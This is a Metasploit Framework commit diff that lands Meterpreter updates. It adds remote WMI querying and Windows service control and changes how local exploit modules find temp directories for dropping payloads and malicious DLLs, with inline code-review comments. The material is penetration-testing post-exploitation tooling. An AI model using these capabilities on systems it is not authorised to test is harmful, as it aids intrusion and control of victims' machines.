Land #3122, lots of Meterpreter updates

This lands the binaries built from Meterpreter as of:

rapid7/meterpreter#80 , also known as

commit 5addac75741fadfff35f4f7839cee6fd69705455

as well as the functional changes in:

rapid7/metasploit-framework#2782
rapid7/metasploit-framework#2889
rapid7/metasploit-framework#3061
rapid7/metasploit-framework#3085
bug/bundler_fix
Tod Beardsley 2014-03-19 15:35:49 -05:00
commit c1cbeff5f0
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
109 changed files with 495 additions and 214 deletions



@ -134,14 +134,16 @@ private
result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)
end
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs|
ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
result[ts] ||= {}
result[ts]['Files'] ||= []
result[ts]['Files'] << {
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
}
fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
result[ts]['Files'] << {
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
}
end
end
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
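Review bot: `result[ts]['Files'] ||= []` now runs before the inner `TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE` loop, so a FILES group that carries no FILE entries still leaves an empty `'Files' => []` under that timestamp, and a group whose TIMESTAMP TLV is absent files everything under a `nil` key. A `next if ts.nil?` right after the `get_tlv_value` call, with the `||= []` moved inside the inner loop, avoids both. The parsing method this hunk belongs to starts and ends outside the hunk, as does the `private` section it sits in.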


@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
require 'rex/post/meterpreter/extensions/extapi/service/service'
require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
module Rex
module Post
@ -29,10 +30,11 @@ class Extapi < Extension
'name' => 'extapi',
'ext' => ObjectAliases.new(
{
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client)
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
'wmi' => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
})
},
])


@ -15,18 +15,26 @@ module Service
###
class Service
SERVICE_OP_START = 1
SERVICE_OP_PAUSE = 2
SERVICE_OP_RESUME = 3
SERVICE_OP_STOP = 4
SERVICE_OP_RESTART = 5
def initialize(client)
@client = client
end
#
# Enumerate all the services on the target.
#
def enumerate
request = Packet.create_request('extapi_service_enum')
response = client.send_request(request)
services = []
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s|
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s|
services << {
:name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
:display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
@ -34,29 +42,59 @@ class Service
:status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
:interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
}
}
end
return services.sort_by { |s| s[:name].upcase }
services.sort_by { |s| s[:name].upcase }
end
#
# Query some detailed parameters about a particular service.
#
def query(service_name)
request = Packet.create_request('extapi_service_query')
request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
response = client.send_request(request)
detail = {
{
:starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
:display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
:startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
:path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
:logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
:interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL)
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL),
:status => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS)
}
end
return detail
#
# Control a single service
#
def control(service_name, op)
if op.is_a? String
case op.strip.downcase
when "start"
op = SERVICE_OP_START
when "pause"
op = SERVICE_OP_PAUSE
when "resume"
op = SERVICE_OP_RESUME
when "stop"
op = SERVICE_OP_STOP
when "restart"
op = SERVICE_OP_RESTART
end
end
unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART
raise ArgumentError, "Invalid operation: #{op}"
end
request = Packet.create_request('extapi_service_control')
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name)
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op)
client.send_request(request)
end
attr_accessor :client
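Review bot: `control` validates `op` but forwards `service_name` to the target unchecked, so a nil or empty name can only fail remotely; a guard beside the existing op check, `raise ArgumentError, 'service_name must not be blank' if service_name.to_s.strip.empty?`, keeps that error local. On style, the `case` mapping `"start"`…`"restart"` onto `SERVICE_OP_*` repeats the constants; a frozen `SERVICE_OPS` hash keyed by the lower-case names would reduce it to `op = SERVICE_OPS.fetch(op.strip.downcase, op) if op.is_a?(String)` and the range test to `SERVICE_OPS.value?(op)`. The method returns whatever `client.send_request` returns, so the console's unconditional success message presumably relies on `send_request` raising on a failed request — a one-line comment stating that contract would help the next reader.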


@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_E
TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27)
TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28)
TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29)
TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_E
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_E
TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65)
TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66)
TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67)
TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68)
TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71)
end
end
end


@ -0,0 +1,75 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Extapi
module Wmi
###
#
# This meterpreter extension contains extended API functions for
# performing WMI queries.
#
###
class Wmi
def initialize(client)
@client = client
end
#
# Perform a generic wmi query against the target machine.
#
# @param query [String] The WMI query string.
# @param root [String] Specify root to target, otherwise defaults
# to 'root\cimv2'
#
# @returns [Hash] Array of field names with associated values.
#
def query(query, root = nil)
request = Packet.create_request('extapi_wmi_query')
request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank?
request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
response = client.send_request(request)
# Bomb out with the right error messa
error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR)
raise error_msg if error_msg
fields = []
fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS)
# If we didn't get any fields back, then we didn't get any results.
# The reason is because without results, we don't know which fields
# were requested in the first place
return nil unless fields_tlv
fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f|
fields << f.value
}
values = []
response.each(TLV_TYPE_EXT_WMI_VALUES) { |r|
value = []
r.each(TLV_TYPE_EXT_WMI_VALUE) { |v|
value << v.value
}
values << value
}
return {
:fields => fields,
:values => values
}
end
attr_accessor :client
end
end; end; end; end; end; end
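Review bot: `raise error_msg if error_msg` raises a bare `RuntimeError` whose text is whatever the target placed in `TLV_TYPE_EXT_WMI_ERROR`, which callers cannot rescue selectively; raising a named class (the framework's request-error class if it is in scope here, or a local `WmiError < StandardError`) lets the dispatcher tell a WMI failure from a transport failure. The comment above it is truncated (`# Bomb out with the right error messa`), and the YARD tag should be `@return [Hash, nil]`, since the method returns nil whenever no FIELDS group comes back. The `'root\cimv2'` default named in the docstring is applied on the target side — this code sends no root TLV at all when `root` is blank — which is worth stating explicitly. `root.blank?` presumably relies on ActiveSupport's `blank?` being loaded, as elsewhere in the framework.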


@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi'
Klass = Console::CommandDispatcher::Extapi
@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi
Klass::Window,
Klass::Service,
Klass::Clipboard,
Klass::Adsi
Klass::Adsi,
Klass::Wmi
]
include Console::CommandDispatcher


@ -22,8 +22,9 @@ class Console::CommandDispatcher::Extapi::Service
#
def commands
{
"service_enum" => "Enumerate all registered Windows services",
"service_query" => "Query more detail about a specific Windows service"
"service_enum" => "Enumerate all registered Windows services",
"service_query" => "Query more detail about a specific Windows service",
"service_control" => "Control a single service (start/pause/resume/stop/restart)"
}
end
@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service
def name
"Extapi: Service Management"
end
#
# Initialize the instance
#
def initialize(shell)
super
@status_map = {
1 => "Stopped",
2 => "Starting",
3 => "Stopping",
4 => "Running",
5 => "Continuing",
6 => "Pausing",
7 => "Paused"
}
@start_type_map = {
0 => "Boot",
1 => "System",
2 => "Automatic",
3 => "Manual",
4 => "Disabled"
}
end
#
# Options for the service_enum command.
#
@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service
# Query a single service for more detail.
#
def cmd_service_enum(*args)
@@service_enum_opts.parse(args) { |opt, idx, val|
@@service_enum_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service
"able to interact with the desktop.\n\n")
return true
end
}
status_map = {
1 => "Stopped",
2 => "Starting",
3 => "Stopping",
4 => "Running",
5 => "Continuing",
6 => "Pausing",
7 => "Paused"
}
end
services = client.extapi.service.enumerate
@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service
]
)
services.each { |s|
services.each do |s|
table << [
s[:pid],
status_map[s[:status]],
@status_map[s[:status]],
s[:interactive] ? "Y" : "N",
"#{s[:name].downcase} (#{s[:display]})"
]
}
end
print_line
print_line(table.to_s)
@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service
# Query a single service for more detail.
#
def cmd_service_query(*args)
args << "-h" if args.length == 0
args.unshift("-h") if args.length != 1
@@service_query_opts.parse(args) { |opt, idx, val|
@@service_query_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service
"binary path, DACL, load order group, start type and more.\n\n")
return true
end
}
end
service_name = args.shift
start_type_map = {
0 => "Boot",
1 => "System",
2 => "Automatic",
3 => "Manual",
4 => "Disabled"
}
detail = client.extapi.service.query(service_name)
print_line
print_line("Name : #{service_name}")
print_line("Display : #{detail[:display]}")
print_line("Account : #{detail[:startname]}")
print_line("Start Type : #{start_type_map[detail[:starttype]]}")
print_line("Status : #{@status_map[detail[:status]]}")
print_line("Start Type : #{@start_type_map[detail[:starttype]]}")
print_line("Path : #{detail[:path]}")
print_line("L.O. Group : #{detail[:logroup]}")
print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service
end
#
# Options for the service_control command.
#
@@service_control_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ]
)
#
# Query a single service for more detail.
#
def cmd_service_control(*args)
args.unshift("-h") if args.length != 2
@@service_control_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print(
"\nUsage: service_control [-h] <servicename> <op>\n" +
" <servicename> : The name of the service to control.\n" +
" <op> : The operation to perform on the service.\n" +
" Valid ops: start pause resume stop restart.\n\n")
return true
end
end
service_name = args[0]
op = args[1]
client.extapi.service.control(service_name, op)
print_good("Operation #{op} succeeded.")
end
end
end
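Review bot: The header comment on `cmd_service_control` still reads `# Query a single service for more detail.`, copied from `cmd_service_query`; it should say `# Start, pause, resume, stop or restart a single service.` An invalid `<op>` makes `client.extapi.service.control` raise `ArgumentError`, which surfaces here as an exception rather than a console error; wrapping the call in `rescue ArgumentError => e` / `print_error(e.message)` / `return false` keeps it readable even if the dispatcher layer already converts exceptions. `@status_map[...]` and `@start_type_map[...]` print nothing for a code outside the mapped range, so `@status_map.fetch(detail[:status], "Unknown (#{detail[:status]})")` would make an unexpected value visible instead of blank. Since neither map ever changes, both could be frozen class-level constants rather than per-instance hashes built in `initialize`.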


@ -0,0 +1,108 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Extended API WMI Querying interface.
#
###
class Console::CommandDispatcher::Extapi::Wmi
Klass = Console::CommandDispatcher::Extapi::Wmi
include Console::CommandDispatcher
# Zero indicates "no limit"
DEFAULT_MAX_RESULTS = 0
DEFAULT_PAGE_SIZE = 0
#
# List of supported commands.
#
def commands
{
"wmi_query" => "Perform a generic WMI query and return the results"
}
end
#
# Name for this dispatcher
#
def name
"Extapi: WMI Querying"
end
#
# Options for the wmi_query command.
#
@@wmi_query_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ],
"-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ]
)
def wmi_query_usage
print(
"\nUsage: wmi_query <query string> [-r root]\n\n" +
"Query the target and display the results.\n\n" +
@@wmi_query_opts.usage)
end
#
# Enumerate WMI objects.
#
def cmd_wmi_query(*args)
args.unshift("-h") if args.length < 1
root = nil
@@wmi_query_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
root = val
when "-h"
wmi_query_usage
return true
end
}
query = args.shift
objects = client.extapi.wmi.query(query, root)
if objects
table = Rex::Ui::Text::Table.new(
'Header' => query,
'Indent' => 0,
'SortIndex' => 0,
'Columns' => objects[:fields]
)
objects[:values].each do |c|
table << c
end
print_line
print_line(table.to_s)
print_line("Total objects: #{objects[:values].length}")
else
print_status("The WMI query yielded no results.")
end
print_line
return true
end
end
end
end
end
end
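Review bot: `query = args.shift` after the option parse takes the first word of `args` whatever it is, so `wmi_query -r root\foo "select ..."` runs the query `-r`; if `Rex::Parser::Arguments#parse` yields non-option words with a nil `opt`, as it does elsewhere in the framework, the query should be captured inside the block with `when nil then query ||= val` and the `args.shift` dropped. `DEFAULT_MAX_RESULTS` and `DEFAULT_PAGE_SIZE` are defined but never read in this file and look carried over from another dispatcher. The table uses `objects[:fields]` as its columns and appends each `objects[:values]` row verbatim, so a row whose length differs from the field list will presumably misalign or fail inside `Rex::Ui::Text::Table`; a `next unless c.length == objects[:fields].length` guard (or padding) would make that case explicit.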


@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
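Review bot: `session.sys.config.getenv('TEMP')` can return nil when the variable is unset on the target, whereas `expand_path("%TEMP%")` returned at worst the literal `%TEMP%`; the interpolation on the next line then yields the root-relative path `\<file>`, and both `attrib.exe` and `rm` operate on a location this module never wrote to. A nil check on `wintemp` before `win_file` is built, skipping the entry with a `print_error`, keeps cleanup from touching a path it did not drop to. The begin/rescue this sits in continues outside the hunk, so its rescue clause presumably reports the failure, but only after the wrong path has been attempted.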


@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end


@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%WINDIR%")
wintemp = session.sys.config.getenv('WINDIR')
win_file = "#{wintemp}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end
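Review bot: This block iterates `@dropped_files.each`, yet the `false` at the bottom of its rescue clause only has meaning under `delete_if`, which the parallel `on_new_session` bodies elsewhere in this commit use — under `each` a file whose deletion failed is neither kept for a retry nor distinguished from one that succeeded. Changing the iterator to `@dropped_files.delete_if do |file|` gives the existing `false` return its intended effect and aligns this module with its siblings. As at the other call sites, `session.sys.config.getenv('WINDIR')` returning nil would produce the root-relative `\Temp\<file>` path, so a nil guard before the interpolation is worth adding. The rescue clause body is partly outside the hunk.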


@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end


@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end
=end


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Use the system path for executable to run except the wordpad
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
windir = client.sys.config.getenv('ProgramFiles')
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
cmd = "notepad.exe"


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin


@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
temp_dir = datastore["WritableDir"]
else
temp_dir = expand_path("%TEMP%")
temp_dir = client.sys.config.getenv('TEMP')
end
print_status("Using #{temp_dir} to drop malicious DLL...")


@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["PATH"]
payload_path = datastore["PATH"]
else
payload_path = session.fs.file.expand_path("%TEMP%")
payload_path = session.sys.config.getenv('TEMP')
end
cmd_location = "#{payload_path}\\#{payload_filename}"


@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
end
def check_permissions!
# Check if you are an admin
vprint_status('Checking admin status...')


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
drive = session.sys.config.getenv('SYSTEMDRIVE')
share_dir = "#{drive}\\#{share_name}"
# Create them

View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
cmd = datastore["CMD"] || nil
upload_fn = nil
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if not cmd
# Get the exe payload.
exe = generate_payload_exe
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
# Create a new task to do our bidding, but make sure it doesn't run.
#
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
sysdir = session.fs.file.expand_path("%SystemRoot%")
sysdir = session.sys.config.getenv('SystemRoot')
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
print_status("Creating task: #{taskname}")


@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def low_integrity_level?
tmp_dir = expand_path("%USERPROFILE%")
tmp_dir = session.sys.config.getenv('USERPROFILE')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs


@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def create_proc
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
begin


@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Launching notepad to host the exploit...")
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)


@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if @payload_arch.first== "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"


@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
# Writes script to target host
def write_script_to_target(vbs,name)
tempdir = expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
def check
os = sysinfo["OS"]
if os =~ /windows/i
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
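Review bot: `session.sys.config.getenv('windir') << "\\system32\\win32k.sys"` appends in place to the string the session method hands back, so if the client ever caches or shares that value it is silently corrupted, and if `windir` is unset the nil makes `check` raise `NoMethodError` instead of reporting. Building the path without mutation, `file_path = "#{session.sys.config.getenv('windir')}\\system32\\win32k.sys"`, removes the first hazard, and a nil check on the variable before `file_version` removes the second.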


@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
# Returns path for XML and payload
def generate_path(rexename)
# Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%")
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
